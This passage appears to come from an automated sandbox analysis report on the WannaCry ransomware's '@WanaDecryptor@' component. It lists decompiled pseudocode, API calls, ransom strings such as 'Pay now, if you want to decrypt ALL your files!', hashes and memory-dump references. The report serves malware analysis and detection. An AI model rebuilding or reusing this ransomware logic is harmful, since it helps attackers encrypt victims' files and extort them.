							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}















                                  0x004038f6
                                  0x004038f8
                                  0x004038fd
                                  0x004038fe
                                  0x00403905
                                  0x0040390d
                                  0x00403911
                                  0x0040392c
                                  0x00403931
                                  0x00403948
                                  0x0040394d
                                  0x0040394f
                                  0x00403953
                                  0x00403953
                                  0x0040395c
                                  0x0040396f
                                  0x0040397a
                                  0x00403980
                                  0x0040399a
                                  0x004039b6
                                  0x004039bb
                                  0x004039bd
                                  0x004039bf
                                  0x004039c1
                                  0x004039c3
                                  0x00000000
                                  0x004039c3
                                  0x0040399c
                                  0x004039a1
                                  0x004039a3
                                  0x004039a5
                                  0x004039a7
                                  0x004039c8
                                  0x004039c8
                                  0x004039c8
                                  0x004039a1
                                  0x004039d1
                                  0x004039dc
                                  0x004039dc
                                  0x004039e5
                                  0x004039f1
                                  0x004039fe
                                  0x00403a0a
                                  0x00403a17

                                  APIs
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                  • sprintf.MSVCRT ref: 0040397A
                                  • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                    • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                    • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                    • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                    • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                  Strings
                                  • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                  • %08X.dky, xrefs: 00403969
                                  • All your files have been decrypted!, xrefs: 004039C3
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                  • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                  • API String ID: 139182656-2046724789
                                  • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                  • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}









                                  0x00404090
                                  0x00404092
                                  0x00404097
                                  0x0040409d
                                  0x0040409e
                                  0x004040a5
                                  0x004040a9
                                  0x004040ac
                                  0x004040b0
                                  0x004040b5
                                  0x004040c2
                                  0x004040c6
                                  0x004040ce
                                  0x004040d5
                                  0x004040da
                                  0x004040dd
                                  0x004040e4
                                  0x004040eb
                                  0x004040f0
                                  0x004040f6
                                  0x004040fb
                                  0x004040fe
                                  0x0040410f
                                  0x00404112
                                  0x00404115
                                  0x00404120
                                  0x00404129
                                  0x0040412c
                                  0x00404139
                                  0x00404143

                                  APIs
                                  • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                  • #860.MFC42(00421798), ref: 004040F6
                                  • #858.MFC42(00000000,00421798), ref: 004040FE
                                  • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540CursorLoad$#567#858#860
                                  • String ID: 0ZA
                                  • API String ID: 2440951079-2594568282
                                  • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                  • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}














                                  0x00407cb0
                                  0x00407cb2
                                  0x00407cbd
                                  0x00407cbe
                                  0x00407cc5
                                  0x00407cd1
                                  0x00407cda
                                  0x00407ce5
                                  0x00407cea
                                  0x00407cf5
                                  0x00407cfc
                                  0x00407d07
                                  0x00407d12
                                  0x00407d1a
                                  0x00407d26
                                  0x00407d31
                                  0x00407d35
                                  0x00407d47
                                  0x00407d4f
                                  0x00407d5b
                                  0x00407d66
                                  0x00407d6e
                                  0x00407d77
                                  0x00407d7f
                                  0x00407d88
                                  0x00407d93
                                  0x00407d9f
                                  0x00407dac

                                  APIs
                                    • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  • #2514.MFC42 ref: 00407CE5
                                  • #2414.MFC42 ref: 00407D1A
                                  • #2414.MFC42 ref: 00407D4F
                                  • #616.MFC42 ref: 00407D6E
                                  • #693.MFC42 ref: 00407D7F
                                  • #641.MFC42 ref: 00407D93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#567$#2514#324#616#641#693
                                  • String ID: [A$[A
                                  • API String ID: 3779294304-353784214
                                  • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                  • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195windowfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				intOrPtr* _t68;
				signed int _t76;
				struct HWND__* _t92;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t118;
				intOrPtr* _t120;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_t68 =  *0x422210; // 0xb24228
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_t113 =  *0x422210; // 0xb24228
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							_t114 =  *0x422210; // 0xb24228
							 *((intOrPtr*)( *_t114 + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							_t118 =  *0x422210; // 0xb24228
							 *((intOrPtr*)( *_t118 + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						_t120 =  *0x422210; // 0xb24228
						 *((intOrPtr*)( *_t120 + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}




































                                  0x0040c240
                                  0x0040c248
                                  0x0040c253
                                  0x0040c25a
                                  0x0040c260
                                  0x0040c26c
                                  0x0040c283
                                  0x0040c28e
                                  0x0040c293
                                  0x0040c296
                                  0x0040c29b
                                  0x0040c2a0
                                  0x0040c2c8
                                  0x0040c2d7
                                  0x0040c2e3
                                  0x0040c2e3
                                  0x0040c2ec
                                  0x0040c2ee
                                  0x0040c2f3
                                  0x0040c303
                                  0x0040c307
                                  0x0040c309
                                  0x0040c30e
                                  0x0040c31f
                                  0x0040c330
                                  0x0040c340
                                  0x0040c342
                                  0x0040c347
                                  0x0040c34b
                                  0x0040c350
                                  0x0040c35b
                                  0x0040c35d
                                  0x0040c362
                                  0x0040c366
                                  0x0040c372
                                  0x0040c373
                                  0x0040c378
                                  0x0040c37d
                                  0x0040c382
                                  0x0040c38f
                                  0x0040c39f
                                  0x0040c3a0
                                  0x0040c3a7
                                  0x0040c3e2
                                  0x0040c3ee
                                  0x0040c3ee
                                  0x0040c3f0
                                  0x0040c3fa
                                  0x0040c402
                                  0x0040c403
                                  0x0040c411
                                  0x0040c417
                                  0x0040c452
                                  0x0040c458
                                  0x0040c45c
                                  0x0040c470
                                  0x0040c472
                                  0x0040c477
                                  0x0040c489
                                  0x0040c48f
                                  0x0040c494
                                  0x0040c497
                                  0x0040c497
                                  0x0040c477
                                  0x0040c45c
                                  0x0040c49e
                                  0x0040c4a9
                                  0x0040c4a9
                                  0x0040c4ab
                                  0x0040c4b3
                                  0x0040c4b6
                                  0x0040c4c1
                                  0x0040c4c5
                                  0x0040c4ca
                                  0x0040c419
                                  0x0040c41b
                                  0x0040c427
                                  0x0040c427
                                  0x0040c429
                                  0x0040c431
                                  0x0040c438
                                  0x0040c448
                                  0x0040c448
                                  0x00000000
                                  0x0040c3a9
                                  0x0040c3ab
                                  0x0040c3b7
                                  0x0040c3b7
                                  0x0040c3b9
                                  0x0040c3c1
                                  0x0040c3c8
                                  0x0040c3d8
                                  0x0040c4cc
                                  0x0040c4d7
                                  0x0040c4e4
                                  0x0040c4e4
                                  0x0040c3a7
                                  0x0040c2a2
                                  0x0040c2ab
                                  0x0040c2b6
                                  0x0040c2b6
                                  0x0040c2bc
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                  • fopen.MSVCRT ref: 0040C46B
                                  • fwrite.MSVCRT ref: 0040C489
                                  • fclose.MSVCRT ref: 0040C48F
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823fclosefopenfwrite
                                  • String ID:
                                  • API String ID: 1132507536-0
                                  • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                  • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68processsynchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}








                                  0x00401aa0
                                  0x00401aa8
                                  0x00401ab5
                                  0x00401abb
                                  0x00401ac5
                                  0x00401ad2
                                  0x00401ad6
                                  0x00401ade
                                  0x00401aeb
                                  0x00401b4c
                                  0x00401aed
                                  0x00401aed
                                  0x00401af3
                                  0x00401b03
                                  0x00401b0c
                                  0x00401b0c
                                  0x00401b12
                                  0x00401b18
                                  0x00401b20
                                  0x00401b20
                                  0x00401b18
                                  0x00401b31
                                  0x00401b38
                                  0x00401b44
                                  0x00401b44

                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                  • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                  • String ID: D
                                  • API String ID: 786732093-2746444292
                                  • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                  • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowtimethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00401140() {
				intOrPtr _v4;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
				}
				return 1;
			}








                                  0x00401143
                                  0x00401145
                                  0x00401160
                                  0x00401162
                                  0x00401175
                                  0x00401177
                                  0x00401178
                                  0x00401184
                                  0x0040118d
                                  0x00401194
                                  0x004011a9
                                  0x004011b3
                                  0x004011c1
                                  0x004011d7
                                  0x004011d7
                                  0x004011e5

                                  APIs
                                  • #4710.MFC42 ref: 00401145
                                  • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                  • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                  • #537.MFC42(Connecting to server...), ref: 0040118D
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                  • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                  Strings
                                  • Connecting to server..., xrefs: 00401188
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                  • String ID: Connecting to server...
                                  • API String ID: 3305248171-1849848738
                                  • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                  • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
